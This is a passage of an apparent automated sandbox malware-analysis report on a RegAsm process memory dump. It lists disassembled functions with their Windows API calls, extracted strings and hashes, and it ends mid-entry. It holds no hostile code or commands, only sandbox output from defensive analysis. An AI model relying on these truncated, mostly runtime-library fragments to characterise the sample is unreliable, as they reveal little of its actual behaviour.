Part of subcall function 0053E309: ReleaseSRWLockExclusive.KERNEL32(0058E970,?,004308F2,00590F6C,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0053E346
Part of subcall function 0053E309: WakeAllConditionVariable.KERNEL32(0058E96C,?,004308F2,00590F6C,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0053E351

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease$ConditionCurrentDirectoryVariableWake
String ID:
API String ID: 350265564-0
Opcode ID: 20b19d1c747daa2e52f487431bb0ad52035ffd319a6807229add14719bed3969
Instruction ID: c310fdeb5a083e577c01ea4250973ffe74c2bb959c660fd7ddc64710599b3d45
Opcode Fuzzy Hash: 20b19d1c747daa2e52f487431bb0ad52035ffd319a6807229add14719bed3969
Instruction Fuzzy Hash: 3D219EB4D002098FCF14DFA4C8859AEBBB1FF88304F14856AE80667394D735AA49CF96

Function 0042CE20 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetUserGeoID.KERNEL32(00000010), ref: 0042CE30

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: User
String ID:
API String ID: 765557111-0
Opcode ID: ef8258a1911f9aa119110de39289810a1352633f695b1a773551b0307fc6c2c0
Instruction ID: c4707849ce39850d1815e66c25a692d446deca643534161b110d06009653fb30
Opcode Fuzzy Hash: ef8258a1911f9aa119110de39289810a1352633f695b1a773551b0307fc6c2c0
Instruction Fuzzy Hash: 5D11B7B9E40209BFDB00DFE4D846BAEBBB4BB48700F1041A9EA14A7380D6716A009B95

Function 0055C286 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,0041C3C8,?,0055A28F,00000001,00000364,0041C3C8,00000006,000000FF,?,?,0054E126,0055A64B,-000927C0), ref: 0055C2C7

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d8e0490d251d1ba86fa582098466794d4c8501324879ce13c3223da671017fad
Instruction ID: 33bc032ac356ba11124bfa49aa80fd72e248d41ff50e084ce45d6eb8378f908f
Opcode Fuzzy Hash: d8e0490d251d1ba86fa582098466794d4c8501324879ce13c3223da671017fad
Instruction Fuzzy Hash: B8F02439A44321AE9B205AA2DC25A5B3F59BF917A2F145113AC84E6094CA20DC4996A0

Function 0041D950 Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMTD ref: 0041D967

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 5d02e800c5644b5004b8121da8109dc6eda21bf3e5351c79f893e8658d782ee5
Instruction ID: 637604d627c08a5797b21f27af9890a3e9d937d8568771b3f86609c91c159c48
Opcode Fuzzy Hash: 5d02e800c5644b5004b8121da8109dc6eda21bf3e5351c79f893e8658d782ee5
Instruction Fuzzy Hash: 40F044F4D0010CEBCB04EFA8C48569EFBB1EF44744F1081AAE80597394D6349F81DB85

Function 0055A608 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0041C3C8,-000927C0,?,0053E038,0041C3C8,?,0041C3C8,00000000,?,0041A2D6), ref: 0055A63A

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 244b091494a9223b10e22d2fe82f580e5546466ba498e3e79f547691520d278a
Instruction ID: e165f2d26d049d755007d28cc8c893f0f0b674b215a3186d80bca8f901ef9986
Opcode Fuzzy Hash: 244b091494a9223b10e22d2fe82f580e5546466ba498e3e79f547691520d278a
Instruction Fuzzy Hash: 94E0E531E002126AEA302A759C64B5E3E4DBF917E2F190323AC55D3090DB20CC4986E7

Function 0051C260 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

Part of subcall function 0051C020: SetLastError.KERNEL32(000005B6), ref: 0051C0CF

boost::exception::~exception.LIBCPMTD ref: 0051C2A4

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLastboost::exception::~exception
String ID:
API String ID: 2030483509-0
Opcode ID: b80183c7910f2b700772a08d66f6a98778b85add2d4a3e2233c493c267d869ec
Instruction ID: 0cecc5c32c56923ef7d3b2b7f9c4b75e7af0e2a042226c3a80d4030c7ffd94ce
Opcode Fuzzy Hash: b80183c7910f2b700772a08d66f6a98778b85add2d4a3e2233c493c267d869ec
Instruction Fuzzy Hash: 4DF08C71840649EBCB04EF94C956BAEBB74FB48720F104368F826636C0DB352E00CB91

Function 0050B800 Relevance: 1.3, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

CharNextA.USER32(00000000,00000000,?,0050B856,0050BE9F,0000002E,00000000,?,0050BE9F), ref: 0050B810

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: ed10844057c1b7a6d87709e7a6c7987db8c21fb9f038978cef2d85980a570400
Instruction ID: aab9afbd044a45454d1ca288d6f8f96450eb21b76fa42f73f465477230c9ede1
Opcode Fuzzy Hash: ed10844057c1b7a6d87709e7a6c7987db8c21fb9f038978cef2d85980a570400
Instruction Fuzzy Hash: D4F03930A08248EBEB24CFA4C5D046EBFFDAF46745B248699E805D7250E730DF01EB40

Non-executed Functions

Function 0042C740 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 492COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0042C8D2

Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82

__aulldiv.LIBCMT ref: 0042CAD0

Strings

n{, xrefs: 0042C878
n{, xrefs: 0042CA52
}{, xrefs: 0042C9F1
n{, xrefs: 0042CCD7

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: n{$n{$n{$}{
API String ID: 3732870572-4154228712
Opcode ID: ac7164b81c3ad28e61984310b11aa3b4af430f7721647b5378721e5851584344
Instruction ID: 70a356f546fa94990332de3083992da1d43ecfcf38406400a452c31a5eca1b33
Opcode Fuzzy Hash: ac7164b81c3ad28e61984310b11aa3b4af430f7721647b5378721e5851584344
Instruction Fuzzy Hash: BE126FB1E002189FEB24DF65DC41BEEBBB5BF88304F1481A9E909B7391D6786E448F54

Function 004210E0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 252COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0042114D

Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81

__aulldiv.LIBCMT ref: 004211CB
__aulldiv.LIBCMT ref: 00421290

Strings

}{, xrefs: 004212B6
n{, xrefs: 00421306

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: n{$}{
API String ID: 3732870572-1042045087
Opcode ID: dcefab8f48aff93b722d70aa59213fa125ac14150980dc289702871d4f65ba08
Instruction ID: 39d18bead5b9f10a66183ffa85e2edf55d1113fd5e6123dae9e6ec200ec09dc3
Opcode Fuzzy Hash: dcefab8f48aff93b722d70aa59213fa125ac14150980dc289702871d4f65ba08
Instruction Fuzzy Hash: B89145B5E00204AFEB14DFA8DC45FAEB7B6FB98715F208119F909BB390D67869018B54

Function 00440600 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 311COMMON

Download Yara Rule

APIs

Part of subcall function 0053E35A: AcquireSRWLockExclusive.KERNEL32(0058E970,?,-00007535,?,004308C5,00590F6C,?,0000000A,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 0053E365
Part of subcall function 0053E35A: ReleaseSRWLockExclusive.KERNEL32(0058E970,?,-00007535,?,004308C5,00590F6C,?,0000000A,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 0053E39F

__aulldiv.LIBCMT ref: 00440911

Part of subcall function 0053E309: AcquireSRWLockExclusive.KERNEL32(0058E970,-00007535,?,004308F2,00590F6C), ref: 0053E313
Part of subcall function 0053E309: ReleaseSRWLockExclusive.KERNEL32(0058E970,?,004308F2,00590F6C,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0053E346
Part of subcall function 0053E309: WakeAllConditionVariable.KERNEL32(0058E96C,?,004308F2,00590F6C,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0053E351

Strings

eks, xrefs: 0044096B, 0044099A
n{, xrefs: 0044089F
j3l6lrek, xrefs: 00440A29, 00440A58
E2', xrefs: 004406FB

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease$ConditionVariableWake__aulldiv
String ID: E2'$eks$j3l6lrek$n{
API String ID: 2808616827-3229564020
Opcode ID: 5a95fa67f9f8ca0c7efddfd82d81ef9ac31cf95a8a6576d0a51e1a2994a7a764
Instruction ID: 078cc1524bed649119e76f08d018b24227f6144dc8b09608589f59eab186b588
Opcode Fuzzy Hash: 5a95fa67f9f8ca0c7efddfd82d81ef9ac31cf95a8a6576d0a51e1a2994a7a764
Instruction Fuzzy Hash: 19E14BB0D002589FDF14DFA5D881BEEBBB1BF58304F14819AE509A7381DB34AA85CF95

Function 0056703D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

PMDtoOffset.LIBCMT ref: 005670CF

Strings

Bad dynamic_cast!, xrefs: 00567111

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Offset
String ID: Bad dynamic_cast!
API String ID: 1587990502-2956939130
Opcode ID: 87541b39ae2e137631827bdbb6531c213785e53ea37b9727a952eb4fc2dbbd03
Instruction ID: c198e6756d8f64ed2925672eb5c0a825644f8c675b271fc4cbf9cfc7f65daa92
Opcode Fuzzy Hash: 87541b39ae2e137631827bdbb6531c213785e53ea37b9727a952eb4fc2dbbd03
Instruction Fuzzy Hash: BD515D72A04209AFDB14DF68DC85AAA7FA5FF88328F048559FD1597281E731F910CBE0

Function 00560A0D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00560D1F,00000002,00000000,?,?,?,00560D1F,?,00000000), ref: 00560AA6
GetLocaleInfoW.KERNEL32(?,20001004,00560D1F,00000002,00000000,?,?,?,00560D1F,?,00000000), ref: 00560ACF
GetACP.KERNEL32(?,?,00560D1F,?,00000000), ref: 00560AE4

Strings

OCP, xrefs: 00560A61
ACP, xrefs: 00560A2B

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: ebcad332e2c7c027143238fac012b2802e9cfdeedf4e6ef925141dee2e0f086f
Instruction ID: 737a64329af9901d05e6d47917e43e6eddcbd1a901434644ddac12d22c904e0b
Opcode Fuzzy Hash: ebcad332e2c7c027143238fac012b2802e9cfdeedf4e6ef925141dee2e0f086f
Instruction Fuzzy Hash: 9F21A432600301AADB35DB94C901A977AA6FB50BD4B16A864E90AD7180F732DD40D750

Function 00560BE9 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0055A0F1: GetLastError.KERNEL32(00000000,[0U,0055D662), ref: 0055A0F5
Part of subcall function 0055A0F1: SetLastError.KERNEL32(00000000,00000000,-000927C0,00000006,000000FF), ref: 0055A197

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00560CF1
IsValidCodePage.KERNEL32(00000000), ref: 00560D2F
IsValidLocale.KERNEL32(?,00000001), ref: 00560D42
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00560D8A
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00560DA5

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 6fa05b6ed5c8c066af6d9efed3996fb69aedb964f4713671ad22a717301438dc
Instruction ID: 22cb3e0dd9e87ecbd21cfe83c5cdc24be9763c96d9e9ec9f10e9ac3d832f1453
Opcode Fuzzy Hash: 6fa05b6ed5c8c066af6d9efed3996fb69aedb964f4713671ad22a717301438dc
Instruction Fuzzy Hash: 35515F71A0020AAFEB10DFA5DC45AAFBBB8BF54700F145569F911E71D0EBB0AE44CB61

Function 00560274 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 254COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0055A0F1: GetLastError.KERNEL32(00000000,[0U,0055D662), ref: 0055A0F5
Part of subcall function 0055A0F1: SetLastError.KERNEL32(00000000,00000000,-000927C0,00000006,000000FF), ref: 0055A197

GetACP.KERNEL32(?,?,?,?,?,?,00556036,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00560333
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00556036,?,?,?,00000055,?,-00000050,?,?), ref: 0056036A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 005604CD

Strings

utf8, xrefs: 0056043C

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: ecb3ccac4cfa858dbe3a4f9b5a5d7de6d94c895d147237c99dccbb61dcd39615
Instruction ID: 4e69425b8d219e4520d202db39861bafbfd5ed4e45ca595549d0b295037e0066
Opcode Fuzzy Hash: ecb3ccac4cfa858dbe3a4f9b5a5d7de6d94c895d147237c99dccbb61dcd39615
Instruction Fuzzy Hash: EC71F671600206ABDB24AB74CC5ABBB7BA8FF44711F14582AFA05DB1C1FB74E944C761

Function 0054009B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,?,0056A50D,000000FF,?,0053FD64,?,?,?,?,0042B77B), ref: 005400D3
GetSystemTimeAsFileTime.KERNEL32(?,6780E6CE,?,?,0056A50D,000000FF,?,0053FD64,?,?,?,?,0042B77B), ref: 005400D7

Strings

uS, xrefs: 005400CD

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Time$FileSystem$Precise
String ID: uS
API String ID: 743729956-336044122
Opcode ID: 2695fee6a449c3401938edb043aae99d86f37b2fdb2fa7f11e92b389907897f7
Instruction ID: de4ab54f658cddc9c38d3431df4de3107a9968bc7d3f701f869f0e5497b64ae4
Opcode Fuzzy Hash: 2695fee6a449c3401938edb043aae99d86f37b2fdb2fa7f11e92b389907897f7
Instruction Fuzzy Hash: 0FF0E536904654EFCB01CF04DC04F99BBA8FB08B24F10062AEC13F3790D779A9049B90

Function 00560691 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 0055A0F1: GetLastError.KERNEL32(00000000,[0U,0055D662), ref: 0055A0F5
Part of subcall function 0055A0F1: SetLastError.KERNEL32(00000000,00000000,-000927C0,00000006,000000FF), ref: 0055A197

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005606E5
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0056072F
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005607F5

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: c811c032df1b5f394aa2df8fd60d1843c9149d2ad31b2b21885c680cea32d6ac
Instruction ID: b8825ce0ddcd1ff02980f796ec14153105a16f0078d0fade5c184c9dc00cbca3
Opcode Fuzzy Hash: c811c032df1b5f394aa2df8fd60d1843c9149d2ad31b2b21885c680cea32d6ac
Instruction Fuzzy Hash: E9618D71A012179FEB68DF28CD86BAB7BA8FF04310F145169E905C71C1EB78E984DB90

Function 00552E40 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,-000927C0), ref: 00552F38
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,-000927C0), ref: 00552F42
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,-000927C0), ref: 00552F4F

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 273f035aae7f14a6b4dfe6792bb726f5b47ae1e3e0869db7f4c712dd1db6accd
Instruction ID: 914a7e64b70086daceee216f4f40908998ec69bd2857afb7b76b9d0786f923e6
Opcode Fuzzy Hash: 273f035aae7f14a6b4dfe6792bb726f5b47ae1e3e0869db7f4c712dd1db6accd
Instruction Fuzzy Hash: 5931D275901229ABCB21DF68DC8D7CDBBB8BF08314F5041EAE81CA7290E7709B858F44

Function 0055ABF4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00556BAC,?,20001004,00000000,00000002,?,?,0055619E), ref: 0055AC28

Strings

uS, xrefs: 0055AC13

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InfoLocale
String ID: uS
API String ID: 2299586839-336044122
Opcode ID: e34368def71fabd4a441d00151e151d323ee67c6db8f94685c55ba95184f5b7e
Instruction ID: 27abaa2e25e6ec570ad70da9bd4b10dba6e32fa2f97ba4800da66809e5379cf4
Opcode Fuzzy Hash: e34368def71fabd4a441d00151e151d323ee67c6db8f94685c55ba95184f5b7e
Instruction Fuzzy Hash: 2AE04F7554021DBBDF122F60ED18E9E7F26FF44752F104612FC0566121CB718D65AAA2

Function 005608E4 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 0055A0F1: GetLastError.KERNEL32(00000000,[0U,0055D662), ref: 0055A0F5
Part of subcall function 0055A0F1: SetLastError.KERNEL32(00000000,00000000,-000927C0,00000006,000000FF), ref: 0055A197

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00560938

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: fcf3895c23e0d12459bf05b3cdfa443e3784f7f002f0e505330fd32bf9724211
Instruction ID: f167be68da6cba3b94b508fb26314bc8fb4e8a09ad721ba7b90ac913828a93ef
Opcode Fuzzy Hash: fcf3895c23e0d12459bf05b3cdfa443e3784f7f002f0e505330fd32bf9724211
Instruction Fuzzy Hash: EC21D372614206ABEF289B28CC46A7B7BA9FF40310F14106AFD01D7182EB74DD40CB50

Function 0056056B Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0055A0F1: GetLastError.KERNEL32(00000000,[0U,0055D662), ref: 0055A0F5
Part of subcall function 0055A0F1: SetLastError.KERNEL32(00000000,00000000,-000927C0,00000006,000000FF), ref: 0055A197

EnumSystemLocalesW.KERNEL32(00560691,00000001,00000000,?,-00000050,?,00560CC5,00000000,?,?,?,00000055,?), ref: 005605DD

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 2302fc989511a61a6341303f2fb938fb449667c785ec37a17127a3adfef2c5ee
Instruction ID: 88d3edcc5594b990dec5f0f468fceaeacf04ba4490dd3c0308e73d1cfc152e58
Opcode Fuzzy Hash: 2302fc989511a61a6341303f2fb938fb449667c785ec37a17127a3adfef2c5ee
Instruction Fuzzy Hash: 4011E5362007055FDB189F39D8A55BBBBA2FFC0358B14442DE9878BA80D771B952CB40

Function 00560B13 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 0055A0F1: GetLastError.KERNEL32(00000000,[0U,0055D662), ref: 0055A0F5
Part of subcall function 0055A0F1: SetLastError.KERNEL32(00000000,00000000,-000927C0,00000006,000000FF), ref: 0055A197

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0056098E,00000000,00000000,?), ref: 00560B3F

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: a000521a1b8166d69cfdff1fba103528d2541d5e406cc297f0b6b9268b6faa8e
Instruction ID: 071c0e53b1cbfedcc9781c8b103cf0c166276c39c6a382b39346100c2bb950ff
Opcode Fuzzy Hash: a000521a1b8166d69cfdff1fba103528d2541d5e406cc297f0b6b9268b6faa8e
Instruction Fuzzy Hash: A501DB326101167BDB185A24D805BBF3B68FF40758F158429ED06A31D0DA70FD41C690

Function 00560479 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0055A0F1: GetLastError.KERNEL32(00000000,[0U,0055D662), ref: 0055A0F5
Part of subcall function 0055A0F1: SetLastError.KERNEL32(00000000,00000000,-000927C0,00000006,000000FF), ref: 0055A197

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 005604CD

Strings

utf8, xrefs: 0056043C

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID: utf8
API String ID: 3736152602-905460609
Opcode ID: fa76924ba7dcb4cac621793e95aeb3d55b6527b35eaca9f48b308d4aae052b8c
Instruction ID: e86287f522ab647638cf9cde0d680dfada0add3aba76a80579947fe8b819bde0
Opcode Fuzzy Hash: fa76924ba7dcb4cac621793e95aeb3d55b6527b35eaca9f48b308d4aae052b8c
Instruction Fuzzy Hash: 6CF0A932610206ABD714AB34DC599BB77DCEB55315F10017AFA02E72C1DE78AD458750

Function 00560606 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0055A0F1: GetLastError.KERNEL32(00000000,[0U,0055D662), ref: 0055A0F5
Part of subcall function 0055A0F1: SetLastError.KERNEL32(00000000,00000000,-000927C0,00000006,000000FF), ref: 0055A197

EnumSystemLocalesW.KERNEL32(005608E4,00000001,?,?,-00000050,?,00560C8D,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00560650

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 7503fc05642f47596caccdc37b33f2b4bc0c73a8e4e22d1781419e11bf4177e6
Instruction ID: f56d249ab91ac548dff3b6e1e0987e3346115741609a770182cfb837293ceb15
Opcode Fuzzy Hash: 7503fc05642f47596caccdc37b33f2b4bc0c73a8e4e22d1781419e11bf4177e6
Instruction Fuzzy Hash: A6F0C2362003045FDB249F39D895A6B7F95FBC0768F05452DF9058B6D1C6B19C82D650

Function 0055A725 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00558C01: EnterCriticalSection.KERNEL32(-00172DB0,?,00554AB2,00000000,005888B0,0000000C,00554A7A,?,?,0055C2B9,?,?,0055A28F,00000001,00000364,0041C3C8), ref: 00558C10

EnumSystemLocalesW.KERNEL32(0055A718,00000001,00588B70,0000000C,0055AAF0,00000000), ref: 0055A75D

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: f2588008cb84fb71bc62c284b757f7e79301faa1d7f59c0035dc03f3fdb7a16c
Instruction ID: 2bf7a53e1ecd4a2700e92f13b87f47b84aa2bfb7e43c1a8dbfe197ed735bb432
Opcode Fuzzy Hash: f2588008cb84fb71bc62c284b757f7e79301faa1d7f59c0035dc03f3fdb7a16c
Instruction Fuzzy Hash: 53F04F76A11205DFD700EF98E856BAD7BF0FB88725F10412BF801EB290CB7559089F51

Function 00560520 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0055A0F1: GetLastError.KERNEL32(00000000,[0U,0055D662), ref: 0055A0F5
Part of subcall function 0055A0F1: SetLastError.KERNEL32(00000000,00000000,-000927C0,00000006,000000FF), ref: 0055A197

EnumSystemLocalesW.KERNEL32(00560479,00000001,?,?,?,00560CE7,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00560557

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 433f7082c7aca7455fd27364a80e2a65d60f7d668e02ed5d8cf12382729cb35b
Instruction ID: 5857d245acb63576c26f5e43ecd3d6841b0e84a395acfde55833b52c304f2aaf
